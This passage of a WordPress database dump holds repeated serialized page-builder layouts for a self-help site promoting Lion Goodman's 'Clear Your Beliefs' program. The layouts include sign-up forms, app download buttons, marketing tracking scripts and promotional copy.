Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1321, 1780, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:48;s:6:"height";i:48;s:4:"file";s:19:"2014/11/favicon.png";s:5:"sizes";a:0:{}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(1320, 1780, '_wp_attached_file', '2014/11/favicon.png'),
(1322, 1780, 'su_slide_link', ''),
(1325, 1782, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1448:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2076:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form style="position: relative; bottom: -2px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> \n\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1210:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big></p>\n\n<form class="infusion-form rd-form-1" style="position: relative; bottom: -50px;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit�&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2812:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li><em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:511:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p><p> </p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1326, 1783, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1448:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2076:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form style="position: relative; bottom: -2px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> \n\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1210:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big></p>\n\n<form class="infusion-form rd-form-1" style="position: relative; bottom: -50px;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit�&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2812:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li><em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:511:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p><p> </p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:62:"<hr>\n<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1327, 1784, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1448:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2076:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" 